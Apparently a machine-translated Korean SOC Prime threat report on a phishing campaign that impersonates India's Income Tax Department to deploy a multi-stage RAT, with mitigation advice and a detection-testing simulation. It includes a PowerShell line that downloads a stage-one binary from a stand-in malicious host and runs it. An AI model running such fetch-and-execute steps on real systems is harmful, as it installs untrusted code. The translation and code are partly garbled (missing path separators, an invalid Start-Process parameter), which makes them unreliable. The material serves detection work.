SOC Prime Bias: 중간

30 Dec 2025 13:29 UTC

피싱 캠페인, 인도 소득세를 사칭하여 기업 겨냥

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon 팔로우
피싱 캠페인, 인도 소득세를 사칭하여 기업 겨냥
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

요약

인도 소득세청을 사칭한 피싱 작업에서는 수신자를 가짜 준수 포털로 유도하는 트랩 PDF를 제공합니다. 이 사이트는 피해자에게 서명된 NSIS 설치 프로그램이 포함된 ZIP 패키지를 다운로드하라고 요청하며, 이후 여러 단계의 원격 액세스 트로이 목마(RAT)를 배포합니다. RAT는 Windows 서비스를 생성하고 비표준 포트를 통해 여러 C2 서버와 통신하여 지속성을 유지합니다.

조사

연구원들은 PDF 유인물, 내장 URL 및 연결된 NSIS 설치 프로그램 워크플로우를 분석했습니다. 그들은 디스크에 드롭된 바이너리, 숨겨진 설치 폴더 생성 및 NSecRTS.exe 를 Windows 서비스로 등록하는 과정을 문서화했습니다. 또한 외부 통신을 세 개의 IP 주소로 캡처하고 전송 체인 전반에 걸쳐 서명된 페이로드 사용을 강조했습니다.

완화

말리시오스 도메인과 관련 IP 주소를 주변과 프록시 제어를 통해 차단하십시오. 세금 테마의 첨부 파일과 유사한 준수 포털로 이어지는 링크를 플래그하기 위해 이메일 보호를 강화하십시오. 자동 설치자의 자동 실행을 가능하면 방지하고 의심스러운 서비스 생성 특히 “Windows 실시간 보호 서비스.”

대응

파일 이름, 해시 및 감염 체인에 연결된 Windows 서비스 등록 활동에 경고하십시오. 영향받은 엔드포인트를 격리하고, 메모리 및 디스크 이미지를 수집하며, 추가적인 RAT 단계나 도구를 식별하기 위해 전체 포렌식 검사를 수행하십시오. 지속성 아티팩트를 제거하고 잠재적으로 노출된 자격 증명을 재설정하여 재입력을 방지하십시오.

공격 흐름

시뮬레이션 실행

필수사항: 원격 측정 및 기준선 사전 비행 검사가 통과되어야 합니다.

이유: 이 섹션은 탐지 규칙을 촉발하기 위해 설계된 상대 기술(TTP)의 구체적인 실행을 자세히 설명합니다. 명령어와 서사는 식별된 TTPs를 직접 반영하고 탐지 로직에 의해 기대되는 정확한 원격 측정을 생성하는 것을 목표로 해야 합니다.

  • 공격 서사 & 명령어:
    상대는 ‘소득세 통지’라는 제목의 피싱 이메일을 제공합니다. 첨부된 것은 setup_Ir5swQ3EpeuBpePEpew=.exe to %TEMP%에 악성 Word 문서를 떨어뜨립니다. 피해자가 파일을 실행하면 Sibuia.exe (진정한 페이로드)라는 자식을 생성합니다. 이 부모-자식 체인은 일반적인 프로세스 생성 경고를 우회하도록 설계되었지만 Sigma 규칙에 의해 포착됩니다.

    침입된 호스트에서 수행된 단계:

    1. 1단계 바이너리 드롭:
      $stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe"
      Invoke-WebRequest -Uri "http://malicious.example.com/stage1" -OutFile $stage1
    2. 1단계 바이너리 실행:
      Start-Process -FilePath $stage1 -NoNewWindow
    3. 1단계 바이너리는 내부적으로 같은 디렉터리에 2단계 바이너리를 생성하고 실행합니다: Sibuia.exe (아래 테스트 스크립트로 시뮬레이션됨.) 회귀 테스트 스크립트:
  • 아래 스크립트는 규칙을 작동시키기 위해 필요한 정확한 부모-자식 관계를 재현합니다.
    # ————————————————- # 인도 소득세 피싱 체인의 시뮬레이션 # ————————————————- # 경로 설정 $stage1 = “$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe” $stage2 = “$env:TEMPSibuia.exe” # 더미 바이너리 생성 (제로 바이트 – Sysmon 로깅에 충분) Set-Content -Path $stage1 -Value ‘REM stage1 placeholder’ -Encoding ASCII Set-Content -Path $stage2 -Value ‘REM stage2 placeholder’ -Encoding ASCII # 파일이 실행 가능하도록 보장 (Windows에는 chmod 필요하지 않음) Write-Host “[*] 1단계 시작 중…” $proc1 = Start-Process -FilePath $stage1 -PassThru # 1단계가 2단계를 ‘스폰’하도록 순간을 줌(직접 실행으로 시뮬레이션됨) Start-Sleep -Milliseconds 500 Write-Host “[*] 1단계가 2단계(Sibuia.exe)를 스폰 중…” $proc2 = Start-Process -FilePath $stage2 -PassThru -Parent $proc1.Id Write-Host “[+] 시뮬레이션 완료. SIEM에서 탐지 확인.” # ————————————————-

    # -------------------------------------------------
    # Simulation of Indian Income‑Tax phishing chain
    # -------------------------------------------------
    # Define paths
    $stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe"
    $stage2 = "$env:TEMPSibuia.exe"
    
    # Create dummy binaries (zero‑byte – sufficient for Sysmon logging)
    Set-Content -Path $stage1 -Value 'REM stage1 placeholder' -Encoding ASCII
    Set-Content -Path $stage2 -Value 'REM stage2 placeholder' -Encoding ASCII
    
    # Ensure files are executable (Windows does not need chmod)
    Write-Host "[*] Launching stage1..."
    $proc1 = Start-Process -FilePath $stage1 -PassThru
    
    # Give stage1 a moment to “spawn” stage2 (simulated by direct launch)
    Start-Sleep -Milliseconds 500
    
    Write-Host "[*] Stage1 spawning stage2 (Sibuia.exe)..."
    $proc2 = Start-Process -FilePath $stage2 -PassThru -Parent $proc1.Id
    
    Write-Host "[+] Simulation complete. Verify detection in SIEM."
    # -------------------------------------------------
  • 정리 명령어:
    아티팩트를 제거하고 남아 있는 프로세스를 종료합니다.

    # 남아 있는 프로세스 종료
    Get-Process -Name "setup_Ir5swQ3EpeuBpePEpew=" -ErrorAction SilentlyContinue | Stop-Process -Force
    Get-Process -Name "Sibuia" -ErrorAction SilentlyContinue | Stop-Process -Force
    
    # 파일 삭제
    Remove-Item -Path "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" -Force -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMPSibuia.exe" -Force -ErrorAction SilentlyContinue
    
    Write-Host "[*] 정리 완료."